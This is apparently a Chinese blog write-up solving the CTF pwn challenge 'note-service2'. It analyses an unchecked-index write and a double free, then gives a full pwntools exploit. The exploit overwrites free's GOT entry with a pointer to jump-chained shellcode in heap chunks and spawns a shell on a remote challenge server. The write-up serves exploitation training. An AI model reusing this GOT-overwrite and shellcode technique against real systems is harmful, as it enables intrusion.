CTF-PWN-note-service2 (堆中shellcode执行)

最新推荐文章于 2023-08-01 21:37:12 发布
最新推荐文章于 2023-08-01 21:37:12 发布
阅读量553 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/103128511
版权

checksec

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

发现没有开启NX,因此很有可能是要我们将shellcode写入某个地方并执行

具体分析

是一个经典的Menu型题目
对该程序进行大概分析后发现主要实现了两个主要功能,一个是add,一个是delete。

add

int Add()
{
  int size; // eax
  int id; // [rsp+8h] [rbp-8h]
  unsigned int Size; // [rsp+Ch] [rbp-4h]

  size = tot;
  if ( tot >= 0 )
  {
    size = tot;
    if ( tot <= 11 )
    {
      printf("index:");
      id = ReadInt();
      printf("size:");
      size = ReadInt();
      Size = size;
      if ( size >= 0 && size <= 8 )
      {
        heap_ptrs[id] = malloc(size);
        if ( !heap_ptrs[id] )
        {
          puts("malloc error");
          exit(0);
        }
        printf("content:");
        ReadString(heap_ptrs[id], Size);
        size = tot++ + 1;
      }
    }
  }
  return size;
}

add主要是malloc一个chunk后将指针记录到表单中,显然id变量没有限制范围,所以可以造成任意地址写。

delete

void Delete()
{
  int id; // ST0C_4

  printf("index:");
  id = ReadInt();
  free((void *)heap_ptrs[id]);
}

显然存在一个double free,但是后面并没有用到这个漏洞

由于add函数中我们可以控制任意地址写,所以我们可以考虑将free函数的got表改成system/execv,这样在堆中的某个chunk存入一个/bin/sh字符串,并free这个chunk即可拿到shell。
如果用泄露真实地址算偏移的方式来做会比较麻烦……所以这里考虑使用syscall来调用execv

syscall的构造

对于本题来说,我们需要用syscall来调用execv函数。所以该流程转化的汇编代码如下:

mov rdi,xxx				xxx为"/bin/sh"的地址
mov rsi,0
mov rdx,0
mov eax,0x3B			0x3B是64位程序中execv函数调用号
syscall

题目中的堆限制我们只能输入7位(还有一位为换行,最后这一位会被置0),所以malloc的每一个chunk都只能存入7位的shellcode。因此对于每一个chunk我们预留一定空间存入跳转指令:
jmp short xxx
这条指令的机器码为\xEB\xXX
其中XX=目标地址-"\xEB"的地址-2
要注意的是chunk的物理地址是在一起的,对于两个相邻的chunk1,chunk2,如果输入的size都是8个字节,那么其实两个chunk的真实大小都是32个字节:8字节pre_size,8字节size,16字节的数据空间(因为malloc(8)最终还是会分配16字节数据空间,但是由于输入的长度由size限制,所以我们只能输入8字节),而我们每次add操作输入的内容都会被存到第三个“8字节”的空间中。
所以计算相邻两个chunk的shellcode偏移 可以知道我们的jmp指令的机器码应该为\xEB\x19

为了节省shellcode空间,所以用xor指令代替mov register,0

exp

from pwn import *
import hashlib
context.update(arch='amd64',log_level='debug')

#p=process("./pwn")
p=remote('111.198.29.45',56868)
elf=ELF('./pwn')
heap_start=0x2020A0

def add(index,content):
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("index:")
    p.sendline(str(index))
    p.recvuntil("size")
    p.sendline("8")
    p.recvuntil("content:")
    p.sendline(content)

def delete(index):
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("index:")
    p.sendline(str(index))

add(0,'/bin/sh')
add((elf.got['free']-heap_start)/8,asm('xor rsi,rsi')+'\x90\x90\xEB\x19')
add(1,asm('mov eax,0x3b')+'\xEB\x19')
add(2,asm('xor rdx,rdx')+'\x90\x90\xEB\x19')
add(4,asm('syscall'))

delete(0)

p.interactive()
SuperGate
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
❤️超详细PWN新手入门教程❤️《二进制各种漏洞原理实战分析总结》
Test网络安全
09-15 1万+
本部分将对常见的二进制漏洞做系统分析,方便在漏洞挖掘过程中定位识别是什么类型漏洞,工欲善其事,必先利其器。 0x01栈溢出漏洞原理 栈溢出漏洞属于缓冲区漏洞的一种,实例如下: #include <stdio.h> #include <string.h> int main() { char *str = "AAAAAAAAAAAAAAAAAAAAAAAA"; vulnfun(str); return; } int vulnfun(char *st
【学习笔记】CTF PWN选手的养成(三)
prettyX的博客
12-04 1253
atum大佬视频的总结 第三章 课时2 堆漏洞的利用技巧 0X01 基础知识 1、操作系统中的内存布局(Linux) 内核空间&用户空间,堆、栈等;cat /proc/pid/maps 要了解ELF文件结构 2、什么是堆? 数据结构:父节点总大于/小于子节点的特殊的完全二叉树 操作系统:程序在运行时动态申请和释放的内存空间(malloc,realloc,free,new,d...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二进制反汇编、密码学、隐写术等。每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得积分。比赛通常在一定的时间内进行,参赛者可以单独或组队参加。 此外,CTF题库也提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。在比赛中,参赛者可以学习新的技能,了解新的安全趋势,并结识志同道合的人。此外,CTF比赛也是一种很好的锻炼方式,能够帮助参赛者提高解决问题的能力和团队协作能力。 CTF题库是学习和提高网络安全技能的极好途径。它们提供了一个实践和交流的平台,使参赛者能够在真实的环境中测试和展示他们的技能。如果您对网络安全感兴趣,请尝试参加一个CTF比赛或挑战集,它们将为您提供有趣和具有挑战性的体验。
double free/use after free/memory leak
qq_36281031的博客
12-06 1001
一、Double Free 双重释放,程序对同一个指针指向的内存重复释放free()了两次。 利用原理 Linux下堆分配器ptmalloc2主要由两个结构管理堆内存,一种是堆块头部形成的隐式链表(chunk结构内的隐式指向),另一种是管理空闲堆块的显式链表(Glibc中的bins数据结构)。 free函数在释放堆块时,会通过隐式链表判断相邻前、后堆块是否为空闲堆块;如果堆块为空闲就会进行合并,然后利用Unlink机制将该空闲堆块从Unsorted bin中取下。 unlink就是把一个双向链表中的空
编写"优美"的SHELLCODE
jincm的专栏
12-31 2828
编写"优美"的SHELLCODE 作者:watercloud   主页:http://www.nsfocus.com 日期:2002-1-4     SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较"优美",那么就 更能体现shellcode的魅力. 个人认为shellcode的优美能在两个地方表现:     shellcode本身应该尽量的短小.
在不知道libc的情况下getshell&&qctf_2018_noleak
azraelxuemo的博客
04-02 262
文章目录qctf_2018_noleak题目分析deleteeditcheckSec攻击思路考虑怎么把堆地址尽量靠近malloc_hook如何把main_arena地址写进去修改为malloc_hook修改malloc_hook为我们bss地址并填入shellcodegetshellallpayload 这个题也真是开了眼了,完全就不知道libc,但最后也是打出来了 qctf_2018_noleak qctf_2018_noleak 题目分析 delete 没有清空 edit 随便堆溢出 checkSe
【二进制安全】堆漏洞:Double Free原理
Juruo@Security
08-01 1199
【二进制安全】Double Free原理
Double free(hows2heap)
fanghuapyk的博客
04-23 1555
1.fastbin_dup fast bin fast bin主要是用来存放一些小的内存,使用fastbin可以提高小内存的分配效率,在默认情况下,对于SIZE_SZ为4B(32位)的平台,小于64B(字节)的chunk分配请求,和对于SIZE_SZ为8B(64位)的平台,小于128B的chunk分配请求首先会在fast bin中查找是否有所需大小的chunk存在,如果存在,就会直接返回内存资源,如果不存在,才会到其他bins中去查找。 fastbins 可以看成一个后进先出的栈,使用单链表来实现,通过 f
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 997
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1:CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF二进制快速入门笔记01
kelxLZ的博客
11-30 1439
常见的二进制程序漏洞 栈溢出,堆溢出,UAF,这个UAF比较经常被问到 上述漏洞怎么利用 一、栈溢出 1.1 基础栈结构 进入函数时: CALLXXX PUSH retadddr(call的下一条指令,目的:知道怎么回来) JMP XXX 进入到XXX PUSH RBP(保存栈基址,好恢复) MOV RBP,RSP(栈底抬上去) SUB RSP,XXh(抬高栈顶给局部函数预留空间) 退出函数时: leave mov rsp,rbp(把rsp弄回来) pop rbp(把rb..
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2577
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
2021 ciscn 华中赛区分区赛 pwn note
yongbaoii的博客
09-02 389
libc 2.31 保护是都拉上的。 刚开始有个花指令,通过一定的调整,再反汇编,就得到了正确的结果。 可以看到除了必要的初始化setbuf之外还将4050的地方清空了。 后面我们会看到4050就是存放地址的地方。 add 看一下content的输入 很明显的off by one。 整体结构还是比较清晰的,最多申请三个chunk。 free 清理的很干净。 show show也是正常泄露。 很明显的off by one,我们的常规思路也就是overlap或者unlink。 因为这里泄露不了基地址,所以我
[攻防世界]noteservice2
m0_55906008的博客
01-15 274
一道基本的堆题
pwnable_hacknote
qq_41560595的博客
04-09 774
IDA,F5 main函数 add_note 函数 notelist是4字节。在源代码中,每个notelist[i]装的是新malloc的地址。 *notelist指向这个地址的内容。 *notelist[i]=print_note_content ,print_note_content又是4个字节。 v1指针指向notelist[0]的内容,即新的malloc地址。那么*notelist内容就可以被分为v1[0]和v1[1]。v1[0]的内容是print_note_content返回值。 v1[1]
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3243
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题可以包含多种类型的漏洞,例如缓冲区溢出、格式化字符串漏洞、整数溢出等。在收集赛题时需要确保涵盖各种漏洞类型,增加题目的多样性和挑战性。 2. 难度级别:赛题的难度级别应该根据参赛者的水平来确定。可以设置多个难度级别的赛题,包括初级、中级和高级,以便参赛者可以逐步提高自己的技能。 3. 原创性:收集ctfd-pwn赛题时应尽量保持赛题的原创性,避免过多的抄袭或重复的赛题。这有助于增加参赛者的学习价值,同时也能提高比赛的公平性。 4. 实用性:收集的赛题应该具有实际应用的意义,能够模拟真实的漏洞和攻击场景。这样可以帮助参赛者更好地理解和掌握系统安全的基本原理。 5. 文档和解答:为每个收集的赛题准备详细的文档和解答是很有必要的。这些文档包括赛题的描述、利用漏洞的步骤和参考资源等,可以帮助参赛者更好地理解赛题和解题思路。 6. 持续更新:CTF比赛的赛题应该定期进行更新和维护,以适应不断变化的网络安全环境。同时也要根据参赛者的反馈和需求,不断收集新的赛题,提供更好的比赛体验。 综上所述,ctfd-pwn赛题的收集需要考虑赛题类型、难度级别、原创性、实用性、文档和解答的准备,以及持续更新的需求。这样才能提供一个富有挑战性和教育性的CTF比赛平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值